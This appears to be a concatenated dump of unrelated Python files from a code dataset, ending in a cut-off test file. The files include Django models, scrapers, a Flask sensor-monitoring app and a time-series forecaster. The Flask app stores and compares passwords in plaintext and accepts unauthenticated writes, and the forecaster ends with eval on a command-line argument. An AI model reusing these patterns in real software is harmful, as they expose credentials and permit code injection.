add_distinct_ids(self, distinct_ids: List[str]) -> None:\n for distinct_id in distinct_ids:\n self.add_distinct_id(distinct_id)\n\n objects = PersonManager()\n created_at: models.DateTimeField = models.DateTimeField(auto_now_add=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n properties: JSONField = JSONField(default=dict)\n is_user: models.ForeignKey = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n\nclass PersonDistinctId(models.Model):\n class Meta:\n constraints = [\n models.UniqueConstraint(fields=['team', 'distinct_id'], name='unique distinct_id for team')\n ]\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n person: models.ForeignKey = models.ForeignKey(Person, on_delete=models.CASCADE)\n distinct_id: models.CharField = models.CharField(max_length=400)\n\nclass Element(models.Model):\n USEFUL_ELEMENTS = ['a', 'button', 'input', 'select', 'textarea', 'label']\n text: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n tag_name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n href: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n attr_id: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n attr_class = ArrayField(models.CharField(max_length=200, blank=True), null=True, blank=True)\n nth_child: models.IntegerField = models.IntegerField(null=True, blank=True)\n nth_of_type: models.IntegerField = models.IntegerField(null=True, blank=True)\n attributes: JSONField = JSONField(default=dict)\n event: models.ForeignKey = models.ForeignKey(Event, on_delete=models.CASCADE)\n order: models.IntegerField = models.IntegerField(null=True, blank=True)\n\nclass Action(models.Model):\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n created_at: models.DateTimeField = models.DateTimeField(auto_now_add=True, blank=True)\n created_by: models.ForeignKey = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n deleted: models.BooleanField = models.BooleanField(default=False)\n\n def __str__(self):\n return self.name\n\nclass ActionStep(models.Model):\n action: models.ForeignKey = models.ForeignKey(Action, related_name='steps', on_delete=models.CASCADE)\n tag_name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n text: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n href: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n selector: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n url: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n event: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n\nclass Funnel(models.Model):\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n created_by: models.ForeignKey = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n deleted: models.BooleanField = models.BooleanField(default=False)\n\nclass FunnelStep(models.Model):\n funnel: models.ForeignKey = models.ForeignKey(Funnel, related_name='steps', on_delete=models.CASCADE)\n action: models.ForeignKey = models.ForeignKey(Action, on_delete=models.CASCADE)\n order: models.IntegerField = models.IntegerField()\n\nclass DashboardItem(models.Model):\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n filters: JSONField = JSONField(default=dict)\n order: models.IntegerField = models.IntegerField(null=True, blank=True)\n type: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n deleted: models.BooleanField = models.BooleanField(default=False)","sub_path":"posthog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400948652","text":"\nclass tree_node:\n def __init__(self,orientation,percent,childOne=None,childTwo=None):\n self.orientation = orientation\n self.percent = percent\n self.childOne = childOne\n self.childTwo = childTwo\n\ndef traverse(node,startx,starty,length,height):\n results = []\n if not node.childOne and not node.childTwo:\n results.append( (startx,starty,startx+length,starty+height) )\n else:\n if node.orientation == 1:\n top_startx = startx\n top_starty = starty\n top_length = length\n top_height = height*node.percent\n bottom_startx = top_startx\n bottom_starty = top_starty + top_height\n bottom_length = length\n bottom_height = height - top_height\n if node.childOne:\n results.extend(traverse(node.childOne,top_startx,top_starty,top_length,top_height))\n if node.childTwo:\n results.extend(traverse(node.childTwo,bottom_startx,bottom_starty,bottom_length,bottom_height))\n elif node.orientation == 2:\n left_startx = startx\n left_starty = starty\n left_length = length*node.percent\n left_height = height\n right_startx = startx + left_length\n right_starty = starty\n right_length = length - left_length\n right_height = height\n if node.childOne:\n results.extend(traverse(node.childOne,left_startx,left_starty,left_length,left_height))\n if node.childTwo:\n results.extend(traverse(node.childTwo,right_startx,right_starty,right_length,right_height))\n\n return results\n\n\ndef parseTree(ind, plotSizeX, plotSizeY):\n\n plan = []\n tree = ind.genome\n plan.append(tree[0])\n tree = tree[1:]\n \n curpos = []\n termconditions = []\n global termCond \n global currInLine\n global currLine\n global currLoc\n\n termCond = []\n currInLine = []\n\n def reclosefunc():\n\n global currInLine\n global currLine\n global currLoc\n global termCond\n\n currInLine[currLine][currLoc] = 2\n if currInLine != termCond:\n if currLoc % 2 != 0:\n currLine = currLine - 1\n for i in xrange(len(tree[currLine])):\n if currInLine[currLine][i] == 1:\n currLoc = i\n reclosefunc()\n break\n \n else:\n currLoc = currLoc + 1\n\n for i in xrange(len(tree)):\n for j in xrange(len(tree[i])):\n curpos.append(0)\n termconditions.append(2)\n currInLine.append(curpos)\n termCond.append(termconditions)\n curpos = []\n termconditions = []\n\n currLine = 0\n currLoc = currInLine[currLine][0]\n \n while (currInLine != termCond):\n currInLine[currLine][currLoc] = 1\n plan.append(tree[currLine][currLoc])\n\n if tree[currLine][currLoc][1] == 1.0 or tree[currLine][currLoc][1] == 0.0:\n reclosefunc() \n else:\n currLine = currLine + 1\n for i in xrange(len(tree[currLine])):\n if currInLine[currLine][i] == 0:\n currLoc = i\n break\n\n plotRooms = []\n plotElements = [(0,0,plotSizeX,plotSizeY)]\n roomDesc = []\n\n for i in xrange(0,len(plan)):\n if plan[i][1] != 1.0 and plan[i][1] != 0.0:\n tree = tree_node(plan[i][0],plan[i][1],tree_node(1,1,None,None),tree_node(1,1,None,None))\n plotDivision = traverse(tree,plotElements[0][0],plotElements[0][1],plotElements[0][2]-plotElements[0][0],plotElements[0][3]-plotElements[0][1])\n plotElements.insert(1,plotDivision[0])\n plotElements.insert(2,plotDivision[1])\n del plotElements[0]\n else:\n if plan[i][1] == 1.0:\n roomDesc.append('R')\n else:\n roomDesc.append('S')\n plotRooms.append(plotElements[0])\n del plotElements[0]\n\n for k in xrange(0, len(roomDesc)):\n plotRooms.insert(2*k,roomDesc[k])\n\n return plotRooms\n\n \n\n\n \n","sub_path":"app/floorplanner/parseTree.py","file_name":"parseTree.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"525801107","text":"# -*- coding:utf8 -*-\n\nimport random,string\n\n\na=(string.ascii_letters+string.digits)\n\n\nprint(''.join(random.sample(string.ascii_uppercase+string.digits,4)))\n\n\nconent=''\nfor i in range(4):\n\tif i != random.randrange(4):\n\t\ttemp=chr(random.randrange(75,90))\n\telse:\n\t\ttemp=str(random.randrange(0,9))\n\tconent+=temp\nprint(conent)\n\n\n\n\n\n","sub_path":"daemon/build_in_module/random/random_2.py","file_name":"random_2.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"210233200","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import rcParams\nfrom pandas import datetime\nfrom pandas import DataFrame\nfrom matplotlib import pyplot\nimport time\nimport itertools\nfrom datetime import datetime, date, time, timedelta\nimport statsmodels.api as sm\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nimport sys\n\ndef predict(ts_day_log):\n import statsmodels.api as sm\n from statsmodels.tsa.arima_model import ARIMA\n from sklearn.metrics import mean_squared_error\n X = ts_day_log.values\n predictions = list()\n model = ARIMA(X, order=(10, 0, 1))\n model_fit = model.fit(transparams=True,trend='c',disp=False)\n predictions = model_fit.forecast(30)[0]\n return np.exp(predictions)\n\ndef Bill_expected(userID): \n BlockT = [94,252,281,352,484,661,716,739,781,865]\n BlockC = [1103,1180,1192,1283,1314,1464,1507,1589,1697,1714,1718,2034]\n BlockG = [2064,2094,2129,2449,2461,2925,2945,3110,3147,3310]\n BlockA = [3367,3413,3482,3723,3773,3893,4031,4213,4297,4732,6910]\n \n ####### Determine Block ########\n ref = ''\n if int(userID) in BlockA:\n ref = '/home/aya/Desktop/Aquapedia/Datasets/blockA.csv'\n elif int(userID) in BlockC:\n ref = '/home/aya/Desktop/Aquapedia/Datasets/blockC.csv'\n elif int(userID) in BlockG:\n ref = '/home/aya/Desktop/Aquapedia/Datasets/blockG.csv'\n elif int(userID) in BlockT:\n ref = '/home/aya/Desktop/Aquapedia/Datasets/blockT.csv'\n else:\n return None\n ###### read data & prepare data #######\n try:\n dateparse = lambda dates: pd.datetime.strptime(dates, '%Y-%m-%d %H:%M:%S')\n data = pd.read_csv(ref , parse_dates= ['localminute'], index_col='localminute',date_parser=dateparse)\n except:\n return None\n group = data.groupby('dataid')\n user = group.get_group(int(userID))['meter_value']\n user_data = user.resample('D').sum()\n userdata = user_data.interpolate(method='linear')\n userdata.dropna(inplace=True)\n userdata = userdata[userdata>0]\n ############ get log of data ########\n try:\n data_log = np.log(userdata)\n ts_log = data_log.replace([np.inf, -np.inf], np.nan)\n ts_day_log = ts_log.interpolate(method='linear')\n #### expected usage ######\n predictions = predict(ts_day_log)\n except:\n predictions = []\n #### current month #######\n user_bill = user.resample('M').sum()\n user_bill = user_bill[user_bill>0]\n try:\n current_user_bill= user_bill[str(user_bill.tail(1).index[0])[:7]]\n except:\n current_user_bill = 0 \n i=1\n with open(\"/home/aya/Desktop/Aquapedia/Datasets/predictions/predictions.csv\", \"a\") as myfile:\n for item in predictions:\n if len(str(i))==1:\n myfile.write(str(userdata.tail(1).index[0])[:7]+'-0'+str(i))\n else:\n myfile.write(str(userdata.tail(1).index[0])[:7]+'-'+str(i))\n myfile.write(',%d,%d' % (int(userID),current_user_bill))\n myfile.write(\",%d \" % item)\n i+=1\n myfile.write('\\n')\neval(sys.argv[1])","sub_path":"python_scripts/customer_dashboard/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"311746767","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef getArticleFromPage(pagenumber):\r\n urlPage = 'https://www.newyorker.com/humor/borowitz-report/page/' + str(pagenumber)\r\n response = requests.get(urlPage)\r\n soupSite = BeautifulSoup(response.text, 'html.parser')\r\n soupArticle = soupSite.find_all(\"div\", class_=\"River__riverItemContent___2hXMG\")\r\n return soupArticle\r\n\r\ndef getHeadlineDataFormArticle(soupArticle):\r\n result = []\r\n for x in soupArticle:\r\n headline = x.find(\"h4\" ,class_= \"River__hed___re6RP\").get_text()\r\n article_link = x.find(\"a\")['href']\r\n is_sarcastic = '1'\r\n result.append([headline, article_link, is_sarcastic])\r\n return result\r\n\r\ndef writeFile(headlineData):\r\n fileOutput = open(\"NewYorker.txt\", \"a\", encoding=\"utf-8\")\r\n for i in headlineData:\r\n strOut = i[0] + \"|https://www.newyorker.com\" + i[1] + \"|\" + i[2] + \"\\n\"\r\n fileOutput.writelines(strOut)\r\n fileOutput.close()\r\n \r\ndef getDataFromPage(pagenumber):\r\n soupArticle = getArticleFromPage(pagenumber)\r\n headlineData = getHeadlineDataFormArticle(soupArticle)\r\n writeFile(headlineData)\r\n print(\"Number of data: \",len(headlineData))\r\n print(\"\\n\")\r\n \r\ndef main():\r\n pagenumber = 143 \r\n while pagenumber:\r\n getDataFromPage(pagenumber)\r\n pagenumber -= 1\r\nmain()\r\n","sub_path":"Colab/CSV/Sarcasm_Detection/Crawler/newyorker.com.py","file_name":"newyorker.com.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"325888483","text":"# Created by Gurudev Dutt on 1/3/20\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n_ARD_COM_PORT = 'COM13'\n_LOWFREQ_LIMIT = 1000000\n_HIGHFREQ_LIMIT = 3200000000\nimport visa\nimport sys\n\n\nclass PTS(object):\n '''\n This is the main module imported to other programs if not using control panel GUI.\n We assume that the sketch running on the arduino connected to PTS is PTS.ino which\n is in the same folder as this python code. It contains 6 main method:\n 1, __init__: finds Arduino, gets visa, and gets ready to communicate, \n 2, read: read current command freq from Arduino\n 3, write: write command freq to Arduino\n 4, set: set amplitude input voltage.\n 5, reset: reset amplitude input to default. (default amplitude adjustable on PTS rear panel)\n 6, scan: scan frequency from start to stop, with number of steps, and dwell time specified by the caller\n 7, cleanup: cleanup\n If not using GUI control panel, just import this class.\n '''\n\n def __init__(self, PTSport = _ARD_COM_PORT):\n self.rm = visa.ResourceManager()\n self.arduino = self.rm.open_resource(PTSport)\n try:\n self.arduino.read()\n except visa.VisaIOError:\n sys.stderr.write('Error communicating with PTS')\n\n def read(self):\n try:\n s = self.arduino.query('b').replace('\\r\\n', '')\n except visa.VisaIOError as error:\n sys.stderr.write('VISA IO Error: {0}'.format(error))\n return None\n return self.decode(s)\n\n def write(self, freq):\n if (int(freq) < _LOWFREQ_LIMIT or int(freq) > _HIGHFREQ_LIMIT):\n sys.stderr.write('Invalid frequency given')\n return False\n try:\n self.arduino.query('f' + str(freq) +'#')\n return True\n except visa.VisaIOError as error:\n sys.stderr.write('VISA IO Error: {0}'.format(error))\n return False\n except:\n sys.stderr.write(\"Unexpected error\", sys.exc_info()[0])\n return False\n\n def decode(self, s):\n '''\n This function decodes BCD string into frequency integer.\n Every 4 bits are decoded to 1 decimal digit.\n @param s: str that consists of '0' and '1' only\n @return: int decoded frequency\n '''\n try:\n while s[0] == '0':\n s = s[1:]\n except IndexError:\n return 0 # This happens when s is nothing but a series of '0'\n if len(s) % 4 != 0:\n s = '0' * (4 - len(s) % 4) + s\n ss = []\n while s != '':\n ss.append(s[:4])\n s = s[4:]\n freq = 0\n for each_4_bits in ss:\n freq *= 10\n freq += int(each_4_bits, 2)\n return freq\n\n def encode(self, freq):\n '''\n This function encodes integer frequency into BCD string.\n Each digit is encoded to 4 bits.\n @param freq: int frequency\n @return: str that consists of '0' and '1' only,length of 38\n '''\n dec_str = str(freq)\n bcd_str = ''\n for each_digit in dec_str:\n s = bin(int(each_digit))[2:]\n if len(s) < 4:\n s = '0' * (4 - len(s)) + s\n bcd_str += s\n l = len(bcd_str)\n if l < 38:\n bcd_str = '0' * (38 - l) + bcd_str\n elif l > 38:\n bcd_str = bcd_str[(l - 38):]\n print(bcd_str)\n return bcd_str\n\n def set(self,amp):\n pass\n\n def reset(self,amp):\n pass\n\n def scan(self, start, stop, numsteps, dwelltime):\n pass\n\n def cleanup(self):\n self.arduino.write('f0#')\n self.arduino.close()","sub_path":"source/Hardware/PTS3200/PTS.py","file_name":"PTS.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"481690400","text":"# Copyright (c) 2019 Microsoft Corporation\n# Distributed under the MIT software license\n\nimport logging\nimport sys\n\nfrom interpret.ext.extension_utils import load_class_extensions\n\nmodule_logger = logging.getLogger(__name__)\n\nBLACKBOX_EXTENSION_KEY = \"interpret_ext_blackbox\"\n\n\ndef _is_valid_blackbox_explainer(proposed_blackbox_explainer):\n for explanation_type in [\"local\", \"global\", \"perf\", \"data\"]:\n if hasattr(proposed_blackbox_explainer, \"explain_\" + explanation_type):\n return True\n return False\n\n\n# How to get the current module\n# https://stackoverflow.com/questions/1676835\ncurrent_module = sys.modules[__name__]\n\nload_class_extensions(current_module, BLACKBOX_EXTENSION_KEY, _is_valid_blackbox_explainer)\n","sub_path":"python/interpret/ext/blackbox/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"256653699","text":"#!/c/Users/User/Anaconda2/python\n\nfrom lxml import html\nfrom lxml.etree import XPath\nimport requests\nimport contestant\n\nclass Season:\n \"\"\"\n Represents a season of the Bachelorette television show\n \"\"\"\n\n def __init__(self, number, url):\n self.number = number\n self.url = url\n self.contestants = [] \n self.rows_xpath = XPath('//*[@id=\"mw-content-text\"]/table[2]/tr')\n self.name_xpath = XPath('td/text()')\n\n def get(self):\n page = requests.get(self.url)\n page_content = html.fromstring(page.content)\n \n for row in self.rows_xpath(page_content): \n if(len(self.name_xpath(row)) > 0):\n row_text = self.name_xpath(row)\n c = contestant.Contestant(row_text[0], row_text[1], row_text[2], row_text[3])\n self.contestants.append(c)\n","sub_path":"scrapper/season.py","file_name":"season.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"367288227","text":"\"\"\"\nNCL_bar_7.py\n===============\nConcepts illustrated:\n - Drawing filled bars\n - Filling the bars in a bar plot with different colors\n - Setting the minimum/maximum value of the Y axis in a bar plot\n - Adding text to a plot\n - Rotating text 45 degrees\n - Drawing a custom legend\n\nThis Python script reproduces the NCL plot script found here: https://www.ncl.ucar.edu/Applications/Scripts/bar_7.ncl\n\nThe NCL graphics and description for this script are found here: https://www.ncl.ucar.edu/Applications/bar.shtml#ex7\n\"\"\"\n\n###############################################################################\n# Import the necessary python libraries\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\n\n\n###############################################################################\n# Create the plot data\nx = [1, 2, 3, 4, 5, 6, 7, 8]\ndata = [154900, 56600, 40000, 30200, 29700, 24400, 21700, 13900]\nlabels = ['Lung', 'Colon/rectum', 'Breast', 'Prostate', 'Pancreas', \n 'Non-Hodgkin\\'s Lymphoma', 'Leukemias', 'Ovary']\n\n###############################################################################\n# Create the custom color list.\ncolor_list = ['firebrick', 'red', 'orange', 'green', 'navy', 'blue', 'skyblue', 'slateblue']\n\n###############################################################################\n# Specify some plot settings.\n\n# Title settings\ntitle = 'Estimated Cancer Deaths for 2002'\ntitle_fontsize = 16\n\n# Axis Settings\nplot_y_max = 180_000\n\n# Tick Settings\nmajor_tick_spacing = 30_000\nminor_tick_spacing = 10_000\ntick_label_fontsize = 12\ntick_length_multiplier = 2\n\n# Label Settings\nlabel_rotation = 45\nlabel_y_offset = 2000\n\n###############################################################################\n# Create the first bar chart.\n\n# Figure size is (width, height) inches.\nplt.figure(1, figsize=(6, 5))\n\nplt.bar(x, data, color=color_list, edgecolor='black')\nplt.title(title, fontsize=title_fontsize)\n\n# Add a rotated label to each bar.\nfor k, label in enumerate(labels):\n plt.text(x[k], data[k]+label_y_offset, label, rotation=label_rotation)\n\n\n# Draw ticks on three sides of the plot. Suppress tick labels on the bottom.\nplt.tick_params(which='both', top=True, right=True, left=True, bottom=False, labelsize=tick_label_fontsize)\nplt.xticks([], [])\n\n# Set the tick spacing and limits for the Y axis.\nax = plt.gca()\nax.yaxis.set_major_locator(MultipleLocator(major_tick_spacing))\nax.yaxis.set_minor_locator(MultipleLocator(minor_tick_spacing))\n\n# Increase the tick mark lengths by some factor.\ny_major_tick_length = plt.rcParams[\"ytick.major.size\"]\ny_minor_tick_length = plt.rcParams[\"ytick.minor.size\"]\nplt.tick_params(which='major', length=y_major_tick_length * tick_length_multiplier)\nplt.tick_params(which='minor', length=y_minor_tick_length * tick_length_multiplier)\n\n# Set the limits for the Y axis.\nplt.ylim(top=plot_y_max)\n\n# Draw plot on the screen.\nplt.show()\n\n\n###############################################################################\n# Create the second bar chart with a legend.\n\n\n## NOTE: you may need to close the first figure window to see the second figure.\n# Figure size is (width, height) inches.\nplt.figure(2, figsize=(6, 5))\n\nbar_handle = plt.bar(x, data, color=color_list, edgecolor='black')\nplt.ylabel(\"Number of Deaths\", fontsize=16)\nplt.title(title, fontsize=title_fontsize)\n\n# Reverse the legend ordering to match NCL.\nbars_reversed = bar_handle[::-1]\nlabels_reversed = labels[::-1]\n\n# Add the legend.\nplt.legend(bars_reversed, labels_reversed)\n\n# Draw ticks on three sides of the plot. Suppress tick labels on the bottom.\nplt.tick_params(which='both', top=True, right=True, left=True, bottom=False, labelsize=tick_label_fontsize)\nplt.xticks([], [])\n\n# Set the tick spacing and limits for the Y axis.\nax = plt.gca()\nax.yaxis.set_major_locator(MultipleLocator(major_tick_spacing))\nax.yaxis.set_minor_locator(MultipleLocator(minor_tick_spacing))\n\n# Increase the tick mark lengths by some factor.\ny_major_tick_length = plt.rcParams[\"ytick.major.size\"]\ny_minor_tick_length = plt.rcParams[\"ytick.minor.size\"]\nplt.tick_params(which='major', length=y_major_tick_length * tick_length_multiplier)\nplt.tick_params(which='minor', length=y_minor_tick_length * tick_length_multiplier)\n\n# Set the limits for the Y axis.\nplt.ylim(top=plot_y_max)\n\n# Move the figure left border, so Y Label appears without manually adjusting the viewport.\nplt.subplots_adjust(left=0.2)\n\n# Draw plot on the screen.\nplt.show()\n","sub_path":"Plots/Bar/NCL_bar_7.py","file_name":"NCL_bar_7.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582371780","text":"import sys\r\nprefix = 'data/clean_inputs/'\r\nedge_prefix = 'data/edge_inputs/'\r\nedges = {}\r\nprint(' ]', end='\\r[')\r\nfor i in range(24):\r\n print('#', sep=' ', end='')\r\n sys.stdout.flush()\r\n filename = 'clear_output_' + str(i) + '.csv'\r\n with open(prefix + filename, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n coord = line.split(';')\r\n for j in range(1, int(len(coord)/2) - 1):\r\n key = coord[2*j-1] + ';' + coord[2*j] + ';' + coord[2*j+1] + ';' + coord[2*j+2]\r\n if (key in edges):\r\n edges[key] += 1\r\n else:\r\n edges[key] = 1\r\n with open(edge_prefix + 'edges_' + str(i) + '.csv', 'a') as f:\r\n for _id, key in zip(range(len(edges)), edges):\r\n f.write(str(_id) + ';' + key + ';' + str(edges[key]) + '\\n')\r\n for x in edges:\r\n edges[x] = 0;\r\n","sub_path":"edgefy.py","file_name":"edgefy.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101757498","text":"import torch\n\nclass CommonUtils():\n def init_bias2zero(self, model):\n for name, params in model.named_parameters():\n if 'bias' in name:\n torch.nn.init.zeros_(params)\n \n \nclass EarlyStopping():\n def __init__(self, patience=0):\n self.step = 0\n self.loss = torch.tensor(float('inf'))\n self.patience = patience\n \n def validation(self, loss):\n if self.loss < loss:\n self.step += 1\n if self.step > self.patience:\n print('Early stopping!')\n return True\n \n else:\n self.step = 0\n self.loss = loss\n \n return False","sub_path":"utils/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"327833325","text":"from django.urls import path, include\r\nfrom . import views\r\nfrom rest_framework import routers\r\n\r\nrouter = routers.DefaultRouter()\r\nrouter.register('shops', views.ShopView)\r\n\r\nurlpatterns = [\r\n path('', include(router.urls)),\r\n path('prefered/', views.LikedShops.as_view()),\r\n path(r'like//', views.LikeShop.as_view())\r\n]\r\n","sub_path":"wcc/api/shops/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"561920601","text":"# import python module\nimport os\nimport pytz\nimport datetime\n\n# import the Flask class from flask module\nfrom flask import Flask, render_template, redirect, \\\n\t\turl_for,request,session,flash, jsonify\nfrom functools import wraps\nfrom flask_socketio import SocketIO\nfrom flask.ext.sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config.from_object(os.environ['APP_SETTINGS'])\ndb = SQLAlchemy(app)\nsocketio = SocketIO(app)\n\nfrom models import *\n\n# login required decorator\ndef login_required(f):\n\t@wraps(f)\n\tdef wrap(*args, **kwargs):\n\t\tif 'logged_in' in session:\n\t\t\treturn f(*args, **kwargs)\n\t\telse:\n\t\t\t# flash('You need to login first.')\n\t\t\treturn redirect(url_for('login'))\n\t\t\t# return render_template('login.html', error=error)\n\treturn wrap\n\n# Restful\n@app.route('/sensor/api/v1.0/temperature/', methods=['GET'])\ndef get_temp(temp_value):\n\tsen_val = temp_value.split('&')\n\ttz = pytz.timezone('Asia/Bangkok')\n\tnow = datetime.datetime.now(tz)\n\n\t# if sen_val[1] == \"temp\":\n\t# \tsocketio.emit('response', {'datetime': now.strftime('%a %b %d %Y %H:%M'),'data': \"%.2f\"%float(sen_val[0])}, \n\t# \t\tbroadcast=True)\n\t#insert into db\n\t# new_measure = Measure(\n\t# \t\tdate = now.strftime('%Y-%m-%d %H:%M:%S'),\n\t# \t\tvalue = float(sen_val[0]),\n\t# \t\tcategory = sen_val[1],\n\t# )\n\t# db.session.add(new_measure)\n\t# db.session.commit()\n\treturn jsonify({'result':'success'})\n\n@app.route('/sensor/api/v1.1/measures/',methods=['GET'])\ndef get_value(recieve_values):\n\tvalues = recieve_values.split(',')\n\tif len(values) == 6:\n\t\ttz = pytz.timezone('Asia/Bangkok')\n\t\tnow = datetime.datetime.now(tz)\n\t\tnew_measure = Measure(\n\t\t\t\tdate = now.strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\tvalue1 = values[0],\n\t\t\t\tvalue2 = values[1],\n\t\t\t\tvalue3 = values[2],\n\t\t\t\tvalue4 = values[3],\n\t\t\t\tdigitalIn = values[4],\n\t\t\t\tdigitalOut = values[5]\n\t\t)\n\t\tdb.session.add(new_measure)\n\t\tdb.session.commit()\n\t\treturn jsonify({'result':'success'})\n\telse:\n\t\treturn jsonify({'result':'error'})\n\n\n@app.route('/')\ndef welcome():\n\treturn render_template('login.html')\n\n@app.route('/locate',methods=['GET','POST'])\n@login_required\ndef locate():\n\treturn render_template('location.html')\n\n@app.route('/index',methods=['GET','POST'])\n@login_required\ndef home():\n\t# t = Measure.query.filter_by(category=\"temp\").order_by(Measure.date.asc()).limit(20)\n\t# test = []\n\t# query = ViewMeasure.query.all()\n\t# for i in query:\n\t# \ttest.append({\"id\":i.id,\"date\":i.date.strftime(\"%a %b %d %Y %H:%M\"),\"value\":\"%.2f\"%i.value,\"category\":i.category})\n\treturn render_template('demo.html',measures=get_measures())\n\n@app.route('/_get_measures')\ndef get_measures():\n\tmeasures = []\n\tquery = ViewMeasure.query.all()\n\tfor i in query:\t\t\n\t\tmeasures.append({\"date\":i.date.strftime(\"%a %b %d %Y %H:%M\"),\"value1\":i.value1,\"value2\":i.value2})\n\treturn measures\n\n# route for handling the login page logic\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\terror = None\n\tif request.method == 'POST':\n\t\tuser = User.query.filter_by(name=request.form['username']).first()\n\t\tif user is not None and user.password == request.form['password']:\n\t\t\tsession['logged_in'] = True\n\t\t\treturn redirect(url_for('locate'))\n\t\telse:\n\t\t\terror = 'Invalid Credentials. Please try again.'\n\treturn render_template('login.html', error=error)\n\n@app.route('/logout')\n@login_required\ndef logout():\n\tsession.pop('logged_in',None)\n\treturn redirect(url_for('login'))\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n\terror = None\n\tif request.method == 'POST':\n\t\tuser = User.query.filter_by(name=request.form['username']).first()\n\t\tif user is None:\t\t\t\n\t\t\tnew_user = User(\n\t\t\t\t\tname = request.form['username'],\n\t\t\t\t\temail = request.form['email'],\n\t\t\t\t\tpassword = request.form['password']\n\t\t\t)\n\t\t\tdb.session.add(new_user)\n\t\t\tdb.session.commit()\n\t\t\tflash('Register success please try to login.')\n\t\t\treturn redirect(url_for('login'))\n\t\telse:\n\t\t\terror = 'Username is invalid. Please try agin'\n\treturn render_template('register.html', error=error)\n\n# start the server with the 'run()' method\nif __name__ == '__main__':\n\tsocketio.run(app)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"360733330","text":"import json\nimport logging\n\nimport py42.sdk.queries.alerts.filters as f\nimport pytest\nfrom c42eventextractor.extractors import AlertExtractor\nfrom py42.exceptions import Py42NotFoundError\nfrom py42.sdk.queries.alerts.filters import AlertState\nfrom tests.cmds.conftest import filter_term_is_in_call_args\nfrom tests.cmds.conftest import get_filter_value_from_json\nfrom tests.cmds.conftest import get_mark_for_search_and_send_to\nfrom tests.conftest import create_mock_response\nfrom tests.conftest import get_test_date_str\n\nfrom code42cli import errors\nfrom code42cli import PRODUCT_NAME\nfrom code42cli.cmds.search import extraction\nfrom code42cli.cmds.search.cursor_store import AlertCursorStore\nfrom code42cli.logger.enums import ServerProtocol\nfrom code42cli.main import cli\n\n\nBEGIN_TIMESTAMP = 1577858400.0\nEND_TIMESTAMP = 